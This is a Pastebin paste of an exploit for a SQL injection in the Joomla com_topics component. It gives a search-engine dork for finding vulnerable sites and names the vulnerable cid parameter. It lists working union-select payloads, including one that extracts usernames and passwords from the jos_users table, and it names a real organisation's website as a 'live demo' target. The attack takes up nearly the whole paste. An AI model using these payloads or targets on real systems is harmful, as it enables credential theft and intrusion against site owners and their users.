API tools faq
paste
Advertisement
xBADGIRL21

Joomla com_topics SQL injection

xBADGIRL21
Jul 9th, 2016
182
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.12 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Exploit Title : Joomla com_topics SQL injection
  3. # Exploit Author : xBADGIRL21
  4. # Dork : inurl:index.php?option=com_topics
  5. # Category: [ Webapps ]
  6. # version: 1.5.12
  7. # Tested on: [ Windows ]
  8. # skype:xbadgirl21
  9. # Date: 2016/07/08
  10. # video Proof Youtube : https://youtu.be/2KynoDHvEkY
  11. ######################
  12. # SQL injection
  13. ######################
  14. # PoC:
  15. # [cid=] Get Parameter Vulnerable To SQL
  16. # http://server/index.php?option=com_topics&view=readall&cid=[SQLi]&Itemid=40931&lang=en
  17. # Demo
  18. # http://server/index.php?option=com_topics&view=readall&cid=5927'&Itemid=40931&lang=en
  19. # http://server/index.php?option=com_topics&view=readall&cid=-5927 /*!union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&Itemid=40931&lang=en
  20. # http://server/index.php?option=com_topics&view=readall&cid=-5927 /*!union*/ select 1,2,/*!group_coNcat(username,0x3a,password)*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /*!from*/ jos_users--&Itemid=40931&lang=en
  21. # Live Demo :
  22. # http://www.paho.org/hq/
  23. ######################
  24. # Discovered by : xBADGIRL21
  25. # Greetz : All Mauritanien Hackers - NoWhere
  26. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!